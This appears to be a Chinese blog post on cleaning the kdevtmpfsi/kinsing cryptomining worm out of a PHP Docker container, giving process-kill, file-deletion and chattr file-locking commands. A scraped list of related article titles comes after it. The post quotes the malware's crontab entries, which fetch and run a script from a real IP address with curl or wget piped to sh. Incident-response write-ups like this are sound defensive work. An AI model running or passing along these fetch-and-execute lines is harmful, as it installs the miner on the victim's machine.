php+挖矿病毒,Kdevtmpfsi 挖矿病毒处理方式
中毒线上状态:CPU占满90%+,引发线上服务处理异常缓慢等问题,从而导致业务异常。
处理方法:
1. 查看占用高的进程。
# top
2. 排序按下1,找到占用高CPU的进程后,Ctrl+z退出。
3. 查找对应的进程号。(可以使用pgrep来更加精确查询)
# ps -aux | grep kdevtmpfsi
# ps -aux | grep kinsing
4. 杀掉该进程。
# kill -9 12739
5. 查找文件及路径。
# find / -name kdevtmpfsi
# find / -name kinsing
6. 进入目录。
# cd /var/lib/docker/overlay2/ba8caaa61e6/diff/tmp/
7. 查看是否有相关文件。
# ls
8. 删除两个k文件。
# rm -rf kdevtmpfsi
# rm -rf kinsing
9. 新建两个文件,随意输入一些字符,按ESC输入:WQ保存。
kinsing为守护文件。
# vim kdevtmpfsi
# vim kinsing
10. 锁定文件,让病毒无法再次创建文件。
# chattr +i kdevtmpfsi
# chattr +i kinsing
设置成功后,显示如下:
----i--------e-- ./kinsing
----i--------e-- ./kdevtmpfsi
11. 显示文件属性,查看确认下是否锁定。
# lsattr
后续发现每个几分钟就会自动下载,采取以上方法都无法杀掉病毒。
进入php容器的工作目录(容器外)
# docker inspect [docker项目] | grep WorkDir
"WorkDir": "/var/lib/docker/overlay2/d7de2bc1a93572d9b986a3dfd7a7cffbf208820cf71f0821164e1d7886c8b62a/work"
# cd /var/lib/docker/overlay2/d7de2bc1a93572d9b986a3dfd7a7cffbf208820cf71f0821164e1d7886c8b62a/diff/tmp
该目录中同样有kdevtmpfsi, kinsing, libsystem.so 这三个文件
杀掉进程,然后删除文件,新建同名文件,chattr +i 加锁
# cd /var/lib/docker/overlay2/d7de2bc1a93572d9b986a3dfd7a7cffbf208820cf71f0821164e1d7886c8b62a/diff/var/spool/cron/crontabs
真正的脚本文件在此目录
# vim www-data
内容如下:
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Tue Nov 17 05:34:10 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * curl http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
注释计划任务, 在容器外chattr +i 加锁
暂时解决,如有TP框架程序,需要将TP框架升级漏洞修复后彻底清除蠕虫。
扩展
1. 不定时可能会有如下进程,如果有则根据进程号杀掉即可。
# ps -ef|grep BjNVW
2. crontab -l 查看定时任务发现出现了如下莫名的定时任务,做了删除处理。crontab -r 表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。
# crontab -l
#* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
3. 查看是否有相关的木马定时任务在执行(root文件里面为定时任务)有的话删掉再重启下crontab(命令:systemctl restart crond.service)
# cd /var/spool/cron
php+挖矿病毒,Kdevtmpfsi 挖矿病毒处理方式相关推荐
- Linux 服务器上有挖矿病毒 kdevtmpfsi 处理办法
症状表现 服务器CPU资源使用一直处于100%的状态,通过 top 命令查看,发现可疑进程 kdevtmpfsi.通过 google搜索,发现这是挖矿病毒. 排查方法 首先:查看 kdevtmpfsi ...
- 排查通过服务器中 redis 的漏洞植入 pnscan 病毒进行挖矿
1 描述 最近买了一台云服务器进行学习研究,然后装了 redis,怎想到了某天晚上 22:00 开始服务器就卡顿了,输入命令半天没响应,然后重新连接则多次超时.最后连接上去了,输入命令 uptim ...
- android.troj.opfake.a病毒,FakeMsdMiner挖矿病毒分析报告
原标题:FakeMsdMiner挖矿病毒分析报告 近日,亚信安全截获新型挖矿病毒FakeMsdMiner,该病毒利用永恒之蓝,永恒浪漫等NSA漏洞进行攻击传播.该病毒具有远控功能,可以获取系统敏感信息 ...
- 什么是勒索病毒,勒索病毒简介,电脑中病毒了怎么修复
什么是勒索病毒: 勒索病毒是一种恶意软件,它的作用是加密或者锁定用户计算机的文件,并要求用户支付赎金以恢复访问权.勒索病毒可以通过某些网站.垃圾邮件.恶意附件和软件.破解软件和广告来传播. 勒索病毒的 ...
- devos勒索病毒解决方法|勒索病毒解密|勒索病毒恢复|数据库修复
目录 引言 一.了解什么是devos勒索病毒? 二.devos勒索病毒的传播方式 三.感染了devos勒索病毒解决方法 四.如何防范devos勒索病毒? 五.结语 引言 随着数字时代的来临,企业在数据 ...
- python控制启动防病毒软件的作用是_122、防病毒软件的作用是_______。 A) 检查计算机是否染有病毒,消除已感染的任何病毒 B) 杜绝病毒对计算...
122.防病毒软件的作用是_______.A)检查计算机是否染有病毒,消除已感染的任何病毒B)杜绝病毒对计算机的感染C)查出计算机已感染的任何病毒,消除其中的一部分D)检查计算机是否染有部... 12 ...
- 攻防技术基础笔记一——病毒、蠕虫病毒、木马、软件漏洞、常见问题、漏洞成因、黑产产业链、遵纪守法、渗透测试、渗透测试方法、VMware的使用、认识kali
攻防技术基础笔记 一.病毒 二.蠕虫(worm)病毒 三.简单辨析蠕虫病毒跟普通病毒 四.木马 五.木马与病毒的区别 六.软件漏洞 七.两个生活中的安全问题 八.漏洞产生的原因 九.漏洞黑产产业链 十 ...
- 根据悍马病毒小结android病毒如何提取root权限
http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651061420&idx=1&sn=edcf32e486d5aaa ...
- 计算机病毒是什么文件形式,【文件病毒】文件病毒的格式、危害、特点_什么是文件病毒_佰佰安全网...
文件型病毒系计算机病毒的一种,主要通过感染计算机中的可执行文件和命令文件.文件型病毒是对计算机的源文件进行修改,使其成为新的带毒文件.一旦计算机运行该文件就会被感染,从而达到传播的目的.文件型病毒分两 ...
最新文章
- step by step YAML 复用
- 教你如何不显示excel中#N/A
- Docker-操作容器1
- data too long for column的解决方法
- CentOS 6.5通过ifconfig命令看不到网卡IP地址的解决方法
- javascript --- 隐藏内部实现(最小暴露原则)
- 使用Java WebSockets,JSR 356和JSON映射到POJO的
- Bootstrap 打印机类
- 0010-伪类选择器-前端学习笔记
- pythonscrapy爬虫_使用Python3和Scrapy进行网站图片爬虫自动下载
- python量化交易书籍推荐_量化交易的几本书籍介绍
- 弗洛伊德本我、自我、超我理论
- 利用Python爬虫爬取淘宝商品做数据挖掘分析实战篇,超详细教程!
- (求助)RPC failed;curl 56 GnuTLS recv error(-9): A TLS packet with unexpected length was received
- 中国睫毛生长液行业市场供需与战略研究报告
- win10浏览器兼容性视图问题
- Line营销机器人2019版
- 【图像去噪】空域+频域滤波图像去噪【含GUI Matlab源码 914期】
- PTA L1-059 敲笨钟
- 移动硬盘出现乱码文件夹的解决方法
热门文章
- 3D数学系列之——从“蒙的挺准”到“蒙的真准”解密蒙特卡洛积分!
- 因为这份简历,我拿到了阿里的offer!(转载)
- python设置子图的坐标_python如何调整子图的大小?
- Linux 安装 scidavis
- http实现大文件上传
- 1253: 统计字符出现的频度
- centos查看进程及结束掉
- SpringCloud服务之间调用,报异常Method has too many Body parameters: public abstract
- 菜鸟学数据库——超键、候选键、主键、外键
- 星环科技数据中台解决方案,助力某政府机构建设新型智慧城市